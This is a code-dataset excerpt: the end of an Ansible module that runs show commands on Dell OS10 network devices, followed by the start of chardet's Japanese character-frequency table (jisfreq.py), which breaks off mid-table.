sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
warnings:
description: The list of warnings (if any) generated by module based on arguments
returned: always
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.dellos10 import run_commands
from ansible.module_utils.dellos10 import dellos10_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network_common import ComplexList
from ansible.module_utils.netcli import Conditional
def to_lines(stdout):
for item in stdout:
if isinstance(item, basestring):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='dellos10_command does not support running config mode '
'commands. Please use dellos10_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
# { command: <str>, prompt: <str>, response: <str> }
commands=dict(type='list', required=True),
wait_for=dict(type='list', aliases=['waitfor']),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(dellos10_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
msg = 'One or more conditional statements have not be satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result = {
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
}
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
Architektor/PySnip | venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/jisfreq.py | 3131 | 47315 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Sampling from about 20M text materials include literature and computer technology
#
# Japanese frequency table, applied to both S-JIS and EUC-JP
# They are sorted in order.
# 128 --> 0.77094
# 256 --> 0.85710
# 512 --> 0.92635
# 1024 --> 0.97130
# 2048 --> 0.99431
#
# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58
# Random Distribution Ration = 512 / (2965+62+83+86-512) = 0.191
#
# Typical Distribution Ratio, 25% of IDR
JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0
# Char to FreqOrder table ,
JIS_TABLE_SIZE = 4368
JISCharToFreqOrder = (
40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16
3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32
1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48
2042,1061,1062, 48, 49, 44, 45, 433, 434,1040,1041, 996, 787,2997,1255,4305, # 64
2108,4609,1684,1648,5073,5074,5075,5076,5077,5078,3687,5079,4610,5080,3927,3928, # 80
5081,3296,3432, 290,2285,1471,2187,5082,2580,2825,1303,2140,1739,1445,2691,3375, # 96
1691,3297,4306,4307,4611, 452,3376,1182,2713,3688,3069,4308,5083,5084,5085,5086, # 112
5087,5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102, # 128
5103,5104,5105,5106,5107,5108,5109,5110,5111,5112,4097,5113,5114,5115,5116,5117, # 144
5118,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5133, # 160
5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,5149, # 176
5150,5151,5152,4612,5153,5154,5155,5156,5157,5158,5159,5160,5161,5162,5163,5164, # 192
5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,1472, 598, 618, 820,1205, # 208
1309,1412,1858,1307,1692,5176,5177,5178,5179,5180,5181,5182,1142,1452,1234,1172, # 224
1875,2043,2149,1793,1382,2973, 925,2404,1067,1241, 960,1377,2935,1491, 919,1217, # 240
1865,2030,1406,1499,2749,4098,5183,5184,5185,5186,5187,5188,2561,4099,3117,1804, # 256
2049,3689,4309,3513,1663,5189,3166,3118,3298,1587,1561,3433,5190,3119,1625,2998, # 272
3299,4613,1766,3690,2786,4614,5191,5192,5193,5194,2161, 26,3377, 2,3929, 20, # 288
3691, 47,4100, 50, 17, 16, 35, 268, 27, 243, 42, 155, 24, 154, 29, 184, # 304
4, 91, 14, 92, 53, 396, 33, 289, 9, 37, 64, 620, 21, 39, 321, 5, # 320
12, 11, 52, 13, 3, 208, 138, 0, 7, 60, 526, 141, 151,1069, 181, 275, # 336
1591, 83, 132,1475, 126, 331, 829, 15, 69, 160, 59, 22, 157, 55,1079, 312, # 352
109, 38, 23, 25, 10, 19, 79,5195, 61, 382,1124, 8, 30,5196,5197,5198, # 368
5199,5200,5201,5202,5203,5204,5205,5206, 89, 62, 74, 34,2416, 112, 139, 196, # 384
271, 149, 84, 607, 131, 765, 46, 88, 153, 683, 76, 874, 101, 258, 57, 80, # 400
32, 364, 121,1508, 169,1547, 68, 235, 145,2999, 41, 360,3027, 70, 63, 31, # 416
43, 259, 262,1383, 99, 533, 194, 66, 93, 846, 217, 192, 56, 106, 58, 565, # 432
280, 272, 311, 256, 146, 82, 308, 71, 100, 128, 214, 655, 110, 261, 104,1140, # 448
54, 51, 36, 87, 67,3070, 185,2618,2936,2020, 28,1066,2390,2059,5207,5208, # 464
5209,5210,5211,5212,5213,5214,5215,5216,4615,5217,5218,5219,5220,5221,5222,5223, # 480
5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,5235,5236,3514,5237,5238, # 496
5239,5240,5241,5242,5243,5244,2297,2031,4616,4310,3692,5245,3071,5246,3598,5247, # 512
4617,3231,3515,5248,4101,4311,4618,3808,4312,4102,5249,4103,4104,3599,5250,5251, # 528
5252,5253,5254,5255,5256,5257,5258,5259,5260,5261,5262,5263,5264,5265,5266,5267, # 544
5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,5279,5280,5281,5282,5283, # 560
5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,5294,5295,5296,5297,5298,5299, # 576
5300,5301,5302,5303,5304,5305,5306,5307,5308,5309,5310,5311,5312,5313,5314,5315, # 592
5316,5317,5318,5319,5320,5321,5322,5323,5324,5325,5326,5327,5328,5329,5330,5331, # 608
5332,5333,5334,5335,5336,5337,5338,5339,5340,5341,5342,5343,5344,5345,5346,5347, # 624
5348,5349,5350,5351,5352,5353,5354,5355,5356,5357,5358,5359,5360,5361,5362,5363, # 640
5364,5365,5366,5367,5368,5369,5370,5371,5372,5373,5374,5375,5376,5377,5378,5379, # 656
5380,5381, 363, 642,2787,2878,2788,2789,2316,3232,2317,3434,2011, 165,1942,3930, # 672
3931,3932,3933,5382,4619,5383,4620,5384,5385,5386,5387,5388,5389,5390,5391,5392, # 688
5393,5394,5395,5396,5397,5398,5399,5400,5401,5402,5403,5404,5405,5406,5407,5408, # 704
5409,5410,5411,5412,5413,5414,5415,5416,5417,5418,5419,5420,5421,5422,5423,5424, # 720
5425,5426,5427,5428,5429,5430,5431,5432,5433,5434,5435,5436,5437,5438,5439,5440, # 736
5441,5442,5443,5444,5445,5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456, # 752
5457,5458,5459,5460,5461,5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472, # 768
5473,5474,5475,5476,5477,5478,5479,5480,5481,5482,5483,5484,5485,5486,5487,5488, # 784
5489,5490,5491,5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504, # 800
5505,5506,5507,5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520, # 816
5521,5522,5523,5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536, # 832
5537,5538,5539,5540,5541,5542,5543,5544,5545,5546,5547,5548,5549,5550,5551,5552, # 848
5553,5554,5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568, # 864
5569,5570,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584, # 880
5585,5586,5587,5588,5589,5590,5591,5592,5593,5594,5595,5596,5597,5598,5599,5600, # 896
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,5615,5616, # 912
5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,5632, # 928
5633,5634,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,5647,5648, # 944
5649,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,5661,5662,5663,5664, # 960
5665,5666,5667,5668,5669,5670,5671,5672,5673,5674,5675,5676,5677,5678,5679,5680, # 976
5681,5682,5683,5684,5685,5686,5687,5688,5689,5690,5691,5692,5693,5694,5695,5696, # 992
5697,5698,5699,5700,5701,5702,5703,5704,5705,5706,5707,5708,5709,5710,5711,5712, # 1008
5713,5714,5715,5716,5717,5718,5719,5720,5721,5722,5723,5724,5725,5726,5727,5728, # 1024
5729,5730,5731,5732,5733,5734,5735,5736,5737,5738,5739,5740,5741,5742,5743,5744, # 1040
5745,5746,5747,5748,5749,5750,5751,5752,5753,5754,5755,5756,5757,5758,5759,5760, # 1056
5761,5762,5763,5764,5765,5766,5767,5768,5769,5770,5771,5772,5773,5774,5775,5776, # 1072
5777,5778,5779,5780,5781,5782,5783,5784,5785,5786,5787,5788,5789,5790,5791,5792, # 1088
5793,5794,5795,5796,5797,5798,5799,5800,5801,5802,5803,5804,5805,5806,5807,5808, # 1104
5809,5810,5811,5812,5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824, # 1120
5825,5826,5827,5828,5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840, # 1136
5841,5842,5843,5844,5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856, # 1152
5857,5858,5859,5860,5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872, # 1168
5873,5874,5875,5876,5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888, # 1184
5889,5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904, # 1200
5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920, # 1216
5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936, # 1232
5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952, # 1248
5953,5954,5955,5956,5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968, # 1264
5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984, # 1280
5985,5986,5987,5988,5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000, # 1296
6001,6002,6003,6004,6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016, # 1312
6017,6018,6019,6020,6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032, # 1328
6033,6034,6035,6036,6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048, # 1344
6049,6050,6051,6052,6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064, # 1360
6065,6066,6067,6068,6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080, # 1376
6081,6082,6083,6084,6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096, # 1392
6097,6098,6099,6100,6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112, # 1408
6113,6114,2044,2060,4621, 997,1235, 473,1186,4622, 920,3378,6115,6116, 379,1108, # 1424
4313,2657,2735,3934,6117,3809, 636,3233, 573,1026,3693,3435,2974,3300,2298,4105, # 1440
854,2937,2463, 393,2581,2417, 539, 752,1280,2750,2480, 140,1161, 440, 708,1569, # 1456
665,2497,1746,1291,1523,3000, 164,1603, 847,1331, 537,1997, 486, 508,1693,2418, # 1472
1970,2227, 878,1220, 299,1030, 969, 652,2751, 624,1137,3301,2619, 65,3302,2045, # 1488
1761,1859,3120,1930,3694,3516, 663,1767, 852, 835,3695, 269, 767,2826,2339,1305, # 1504
896,1150, 770,1616,6118, 506,1502,2075,1012,2519, 775,2520,2975,2340,2938,4314, # 1520
3028,2086,1224,1943,2286,6119,3072,4315,2240,1273,1987,3935,1557, 175, 597, 985, # 1536
3517,2419,2521,1416,3029, 585, 938,1931,1007,1052,1932,1685,6120,3379,4316,4623, # 1552
804, 599,3121,1333,2128,2539,1159,1554,2032,3810, 687,2033,2904, 952, 675,1467, # 1568
3436,6121,2241,1096,1786,2440,1543,1924, 980,1813,2228, 781,2692,1879, 728,1918, # 1584
3696,4624, 548,1950,4625,1809,1088,1356,3303,2522,1944, 502, 972, 373, 513,2827, # 1600
586,2377,2391,1003,1976,1631,6122,2464,1084, 648,1776,4626,2141, 324, 962,2012, # 1616
2177,2076,1384, 742,2178,1448,1173,1810, 222, 102, 301, 445, 125,2420, 662,2498, # 1632
277, 200,1476,1165,1068, 224,2562,1378,1446, 450,1880, 659, 791, 582,4627,2939, # 1648
3936,1516,1274, 555,2099,3697,1020,1389,1526,3380,1762,1723,1787,2229, 412,2114, # 1664
1900,2392,3518, 512,2597, 427,1925,2341,3122,1653,1686,2465,2499, 697, 330, 273, # 1680
380,2162, 951, 832, 780, 991,1301,3073, 965,2270,3519, 668,2523,2636,1286, 535, # 1696
1407, 518, 671, 957,2658,2378, 267, 611,2197,3030,6123, 248,2299, 967,1799,2356, # 1712
850,1418,3437,1876,1256,1480,2828,1718,6124,6125,1755,1664,2405,6126,4628,2879, # 1728
2829, 499,2179, 676,4629, 557,2329,2214,2090, 325,3234, 464, 811,3001, 992,2342, # 1744
2481,1232,1469, 303,2242, 466,1070,2163, 603,1777,2091,4630,2752,4631,2714, 322, # 1760
2659,1964,1768, 481,2188,1463,2330,2857,3600,2092,3031,2421,4632,2318,2070,1849, # 1776
2598,4633,1302,2254,1668,1701,2422,3811,2905,3032,3123,2046,4106,1763,1694,4634, # 1792
1604, 943,1724,1454, 917, 868,2215,1169,2940, 552,1145,1800,1228,1823,1955, 316, # 1808
1080,2510, 361,1807,2830,4107,2660,3381,1346,1423,1134,4108,6127, 541,1263,1229, # 1824
1148,2540, 545, 465,1833,2880,3438,1901,3074,2482, 816,3937, 713,1788,2500, 122, # 1840
1575, 195,1451,2501,1111,6128, 859, 374,1225,2243,2483,4317, 390,1033,3439,3075, # 1856
2524,1687, 266, 793,1440,2599, 946, 779, 802, 507, 897,1081, 528,2189,1292, 711, # 1872
1866,1725,1167,1640, 753, 398,2661,1053, 246, 348,4318, 137,1024,3440,1600,2077, # 1888
2129, 825,4319, 698, 238, 521, 187,2300,1157,2423,1641,1605,1464,1610,1097,2541, # 1904
1260,1436, 759,2255,1814,2150, 705,3235, 409,2563,3304, 561,3033,2005,2564, 726, # 1920
1956,2343,3698,4109, 949,3812,3813,3520,1669, 653,1379,2525, 881,2198, 632,2256, # 1936
1027, 778,1074, 733,1957, 514,1481,2466, 554,2180, 702,3938,1606,1017,1398,6129, # 1952
1380,3521, 921, 993,1313, 594, 449,1489,1617,1166, 768,1426,1360, 495,1794,3601, # 1968
1177,3602,1170,4320,2344, 476, 425,3167,4635,3168,1424, 401,2662,1171,3382,1998, # 1984
1089,4110, 477,3169, 474,6130,1909, 596,2831,1842, 494, 693,1051,1028,1207,3076, # 2000
606,2115, 727,2790,1473,1115, 743,3522, 630, 805,1532,4321,2021, 366,1057, 838, # 2016
684,1114,2142,4322,2050,1492,1892,1808,2271,3814,2424,1971,1447,1373,3305,1090, # 2032
1536,3939,3523,3306,1455,2199, 336, 369,2331,1035, 584,2393, 902, 718,2600,6131, # 2048
2753, 463,2151,1149,1611,2467, 715,1308,3124,1268, 343,1413,3236,1517,1347,2663, # 2064
2093,3940,2022,1131,1553,2100,2941,1427,3441,2942,1323,2484,6132,1980, 872,2368, # 2080
2441,2943, 320,2369,2116,1082, 679,1933,3941,2791,3815, 625,1143,2023, 422,2200, # 2096
3816,6133, 730,1695, 356,2257,1626,2301,2858,2637,1627,1778, 937, 883,2906,2693, # 2112
3002,1769,1086, 400,1063,1325,3307,2792,4111,3077, 456,2345,1046, 747,6134,1524, # 2128
884,1094,3383,1474,2164,1059, 974,1688,2181,2258,1047, 345,1665,1187, 358, 875, # 2144
3170, 305, 660,3524,2190,1334,1135,3171,1540,1649,2542,1527, 927, 968,2793, 885, # 2160
1972,1850, 482, 500,2638,1218,1109,1085,2543,1654,2034, 876, 78,2287,1482,1277, # 2176
861,1675,1083,1779, 724,2754, 454, 397,1132,1612,2332, 893, 672,1237, 257,2259, # 2192
2370, 135,3384, 337,2244, 547, 352, 340, 709,2485,1400, 788,1138,2511, 540, 772, # 2208
1682,2260,2272,2544,2013,1843,1902,4636,1999,1562,2288,4637,2201,1403,1533, 407, # 2224
576,3308,1254,2071, 978,3385, 170, 136,1201,3125,2664,3172,2394, 213, 912, 873, # 2240
3603,1713,2202, 699,3604,3699, 813,3442, 493, 531,1054, 468,2907,1483, 304, 281, # 2256
4112,1726,1252,2094, 339,2319,2130,2639, 756,1563,2944, 748, 571,2976,1588,2425, # 2272
2715,1851,1460,2426,1528,1392,1973,3237, 288,3309, 685,3386, 296, 892,2716,2216, # 2288
1570,2245, 722,1747,2217, 905,3238,1103,6135,1893,1441,1965, 251,1805,2371,3700, # 2304
2601,1919,1078, 75,2182,1509,1592,1270,2640,4638,2152,6136,3310,3817, 524, 706, # 2320
1075, 292,3818,1756,2602, 317, 98,3173,3605,3525,1844,2218,3819,2502, 814, 567, # 2336
385,2908,1534,6137, 534,1642,3239, 797,6138,1670,1529, 953,4323, 188,1071, 538, # 2352
178, 729,3240,2109,1226,1374,2000,2357,2977, 731,2468,1116,2014,2051,6139,1261, # 2368
1593, 803,2859,2736,3443, 556, 682, 823,1541,6140,1369,2289,1706,2794, 845, 462, # 2384
2603,2665,1361, 387, 162,2358,1740, 739,1770,1720,1304,1401,3241,1049, 627,1571, # 2400
2427,3526,1877,3942,1852,1500, 431,1910,1503, 677, 297,2795, 286,1433,1038,1198, # 2416
2290,1133,1596,4113,4639,2469,1510,1484,3943,6141,2442, 108, 712,4640,2372, 866, # 2432
3701,2755,3242,1348, 834,1945,1408,3527,2395,3243,1811, 824, 994,1179,2110,1548, # 2448
1453, 790,3003, 690,4324,4325,2832,2909,3820,1860,3821, 225,1748, 310, 346,1780, # 2464
2470, 821,1993,2717,2796, 828, 877,3528,2860,2471,1702,2165,2910,2486,1789, 453, # 2480
359,2291,1676, 73,1164,1461,1127,3311, 421, 604, 314,1037, 589, 116,2487, 737, # 2496
837,1180, 111, 244, 735,6142,2261,1861,1362, 986, 523, 418, 581,2666,3822, 103, # 2512
855, 503,1414,1867,2488,1091, 657,1597, 979, 605,1316,4641,1021,2443,2078,2001, # 2528
1209, 96, 587,2166,1032, 260,1072,2153, 173, 94, 226,3244, 819,2006,4642,4114, # 2544
2203, 231,1744, 782, 97,2667, 786,3387, 887, 391, 442,2219,4326,1425,6143,2694, # 2560
633,1544,1202, 483,2015, 592,2052,1958,2472,1655, 419, 129,4327,3444,3312,1714, # 2576
1257,3078,4328,1518,1098, 865,1310,1019,1885,1512,1734, 469,2444, 148, 773, 436, # 2592
1815,1868,1128,1055,4329,1245,2756,3445,2154,1934,1039,4643, 579,1238, 932,2320, # 2608
353, 205, 801, 115,2428, 944,2321,1881, 399,2565,1211, 678, 766,3944, 335,2101, # 2624
1459,1781,1402,3945,2737,2131,1010, 844, 981,1326,1013, 550,1816,1545,2620,1335, # 2640
1008, 371,2881, 936,1419,1613,3529,1456,1395,2273,1834,2604,1317,2738,2503, 416, # 2656
1643,4330, 806,1126, 229, 591,3946,1314,1981,1576,1837,1666, 347,1790, 977,3313, # 2672
764,2861,1853, 688,2429,1920,1462, 77, 595, 415,2002,3034, 798,1192,4115,6144, # 2688
2978,4331,3035,2695,2582,2072,2566, 430,2430,1727, 842,1396,3947,3702, 613, 377, # 2704
278, 236,1417,3388,3314,3174, 757,1869, 107,3530,6145,1194, 623,2262, 207,1253, # 2720
2167,3446,3948, 492,1117,1935, 536,1838,2757,1246,4332, 696,2095,2406,1393,1572, # 2736
3175,1782, 583, 190, 253,1390,2230, 830,3126,3389, 934,3245,1703,1749,2979,1870, # 2752
2545,1656,2204, 869,2346,4116,3176,1817, 496,1764,4644, 942,1504, 404,1903,1122, # 2768
1580,3606,2945,1022, 515, 372,1735, 955,2431,3036,6146,2797,1110,2302,2798, 617, # 2784
6147, 441, 762,1771,3447,3607,3608,1904, 840,3037, 86, 939,1385, 572,1370,2445, # 2800
1336, 114,3703, 898, 294, 203,3315, 703,1583,2274, 429, 961,4333,1854,1951,3390, # 2816
2373,3704,4334,1318,1381, 966,1911,2322,1006,1155, 309, 989, 458,2718,1795,1372, # 2832
1203, 252,1689,1363,3177, 517,1936, 168,1490, 562, 193,3823,1042,4117,1835, 551, # 2848
470,4645, 395, 489,3448,1871,1465,2583,2641, 417,1493, 279,1295, 511,1236,1119, # 2864
72,1231,1982,1812,3004, 871,1564, 984,3449,1667,2696,2096,4646,2347,2833,1673, # 2880
3609, 695,3246,2668, 807,1183,4647, 890, 388,2333,1801,1457,2911,1765,1477,1031, # 2896
3316,3317,1278,3391,2799,2292,2526, 163,3450,4335,2669,1404,1802,6148,2323,2407, # 2912
1584,1728,1494,1824,1269, 298, 909,3318,1034,1632, 375, 776,1683,2061, 291, 210, # 2928
1123, 809,1249,1002,2642,3038, 206,1011,2132, 144, 975, 882,1565, 342, 667, 754, # 2944
1442,2143,1299,2303,2062, 447, 626,2205,1221,2739,2912,1144,1214,2206,2584, 760, # 2960
1715, 614, 950,1281,2670,2621, 810, 577,1287,2546,4648, 242,2168, 250,2643, 691, # 2976
123,2644, 647, 313,1029, 689,1357,2946,1650, 216, 771,1339,1306, 808,2063, 549, # 2992
913,1371,2913,2914,6149,1466,1092,1174,1196,1311,2605,2396,1783,1796,3079, 406, # 3008
2671,2117,3949,4649, 487,1825,2220,6150,2915, 448,2348,1073,6151,2397,1707, 130, # 3024
900,1598, 329, 176,1959,2527,1620,6152,2275,4336,3319,1983,2191,3705,3610,2155, # 3040
3706,1912,1513,1614,6153,1988, 646, 392,2304,1589,3320,3039,1826,1239,1352,1340, # 3056
2916, 505,2567,1709,1437,2408,2547, 906,6154,2672, 384,1458,1594,1100,1329, 710, # 3072
423,3531,2064,2231,2622,1989,2673,1087,1882, 333, 841,3005,1296,2882,2379, 580, # 3088
1937,1827,1293,2585, 601, 574, 249,1772,4118,2079,1120, 645, 901,1176,1690, 795, # 3104
2207, 478,1434, 516,1190,1530, 761,2080, 930,1264, 355, 435,1552, 644,1791, 987, # 3120
220,1364,1163,1121,1538, 306,2169,1327,1222, 546,2645, 218, 241, 610,1704,3321, # 3136
1984,1839,1966,2528, 451,6155,2586,3707,2568, 907,3178, 254,2947, 186,1845,4650, # 3152
745, 432,1757, 428,1633, 888,2246,2221,2489,3611,2118,1258,1265, 956,3127,1784, # 3168
4337,2490, 319, 510, 119, 457,3612, 274,2035,2007,4651,1409,3128, 970,2758, 590, # 3184
2800, 661,2247,4652,2008,3950,1420,1549,3080,3322,3951,1651,1375,2111, 485,2491, # 3200
1429,1156,6156,2548,2183,1495, 831,1840,2529,2446, 501,1657, 307,1894,3247,1341, # 3216
666, 899,2156,1539,2549,1559, 886, 349,2208,3081,2305,1736,3824,2170,2759,1014, # 3232
1913,1386, 542,1397,2948, 490, 368, 716, 362, 159, 282,2569,1129,1658,1288,1750, # 3248
2674, 276, 649,2016, 751,1496, 658,1818,1284,1862,2209,2087,2512,3451, 622,2834, # 3264
376, 117,1060,2053,1208,1721,1101,1443, 247,1250,3179,1792,3952,2760,2398,3953, # 3280
6157,2144,3708, 446,2432,1151,2570,3452,2447,2761,2835,1210,2448,3082, 424,2222, # 3296
1251,2449,2119,2836, 504,1581,4338, 602, 817, 857,3825,2349,2306, 357,3826,1470, # 3312
1883,2883, 255, 958, 929,2917,3248, 302,4653,1050,1271,1751,2307,1952,1430,2697, # 3328
2719,2359, 354,3180, 777, 158,2036,4339,1659,4340,4654,2308,2949,2248,1146,2232, # 3344
3532,2720,1696,2623,3827,6158,3129,1550,2698,1485,1297,1428, 637, 931,2721,2145, # 3360
914,2550,2587, 81,2450, 612, 827,2646,1242,4655,1118,2884, 472,1855,3181,3533, # 3376
3534, 569,1353,2699,1244,1758,2588,4119,2009,2762,2171,3709,1312,1531,6159,1152, # 3392
1938, 134,1830, 471,3710,2276,1112,1535,3323,3453,3535, 982,1337,2950, 488, 826, # 3408
674,1058,1628,4120,2017, 522,2399, 211, 568,1367,3454, 350, 293,1872,1139,3249, # 3424
1399,1946,3006,1300,2360,3324, 588, 736,6160,2606, 744, 669,3536,3828,6161,1358, # 3440
199, 723, 848, 933, 851,1939,1505,1514,1338,1618,1831,4656,1634,3613, 443,2740, # 3456
3829, 717,1947, 491,1914,6162,2551,1542,4121,1025,6163,1099,1223, 198,3040,2722, # 3472
370, 410,1905,2589, 998,1248,3182,2380, 519,1449,4122,1710, 947, 928,1153,4341, # 3488
2277, 344,2624,1511, 615, 105, 161,1212,1076,1960,3130,2054,1926,1175,1906,2473, # 3504
414,1873,2801,6164,2309, 315,1319,3325, 318,2018,2146,2157, 963, 631, 223,4342, # 3520
4343,2675, 479,3711,1197,2625,3712,2676,2361,6165,4344,4123,6166,2451,3183,1886, # 3536
2184,1674,1330,1711,1635,1506, 799, 219,3250,3083,3954,1677,3713,3326,2081,3614, # 3552
1652,2073,4657,1147,3041,1752, 643,1961, 147,1974,3955,6167,1716,2037, 918,3007, # 3568
1994, 120,1537, 118, 609,3184,4345, 740,3455,1219, 332,1615,3830,6168,1621,2980, # 3584
1582, 783, 212, 553,2350,3714,1349,2433,2082,4124, 889,6169,2310,1275,1410, 973, # 3600
166,1320,3456,1797,1215,3185,2885,1846,2590,2763,4658, 629, 822,3008, 763, 940, # 3616
1990,2862, 439,2409,1566,1240,1622, 926,1282,1907,2764, 654,2210,1607, 327,1130, # 3632
3956,1678,1623,6170,2434,2192, 686, 608,3831,3715, 903,3957,3042,6171,2741,1522, # 3648
1915,1105,1555,2552,1359, 323,3251,4346,3457, 738,1354,2553,2311,2334,1828,2003, # 3664
3832,1753,2351,1227,6172,1887,4125,1478,6173,2410,1874,1712,1847, 520,1204,2607, # 3680
264,4659, 836,2677,2102, 600,4660,3833,2278,3084,6174,4347,3615,1342, 640, 532, # 3696
543,2608,1888,2400,2591,1009,4348,1497, 341,1737,3616,2723,1394, 529,3252,1321, # 3712
983,4661,1515,2120, 971,2592, 924, 287,1662,3186,4349,2700,4350,1519, 908,1948, # 3728
2452, 156, 796,1629,1486,2223,2055, 694,4126,1259,1036,3392,1213,2249,2742,1889, # 3744
1230,3958,1015, 910, 408, 559,3617,4662, 746, 725, 935,4663,3959,3009,1289, 563, # 3760
867,4664,3960,1567,2981,2038,2626, 988,2263,2381,4351, 143,2374, 704,1895,6175, # 3776
1188,3716,2088, 673,3085,2362,4352, 484,1608,1921,2765,2918, 215, 904,3618,3537, # 3792
894, 509, 976,3043,2701,3961,4353,2837,2982, 498,6176,6177,1102,3538,1332,3393, # 3808
1487,1636,1637, 233, 245,3962, 383, 650, 995,3044, 460,1520,1206,2352, 749,3327, # 3824
530, 700, 389,1438,1560,1773,3963,2264, 719,2951,2724,3834, 870,1832,1644,1000, # 3840
839,2474,3717, 197,1630,3394, 365,2886,3964,1285,2133, 734, 922, 818,1106, 732, # 3856
480,2083,1774,3458, 923,2279,1350, 221,3086, 85,2233,2234,3835,1585,3010,2147, # 3872
1387,1705,2382,1619,2475, 133, 239,2802,1991,1016,2084,2383, 411,2838,1113, 651, # 3888
1985,1160,3328, 990,1863,3087,1048,1276,2647, 265,2627,1599,3253,2056, 150, 638, # 3904
2019, 656, 853, 326,1479, 680,1439,4354,1001,1759, 413,3459,3395,2492,1431, 459, # 3920
4355,1125,3329,2265,1953,1450,2065,2863, 849, 351,2678,3131,3254,3255,1104,1577, # 3936
227,1351,1645,2453,2193,1421,2887, 812,2121, 634, 95,2435, 201,2312,4665,1646, # 3952
1671,2743,1601,2554,2702,2648,2280,1315,1366,2089,3132,1573,3718,3965,1729,1189, # 3968
328,2679,1077,1940,1136, 558,1283, 964,1195, 621,2074,1199,1743,3460,3619,1896, # 3984
1916,1890,3836,2952,1154,2112,1064, 862, 378,3011,2066,2113,2803,1568,2839,6178, # 4000
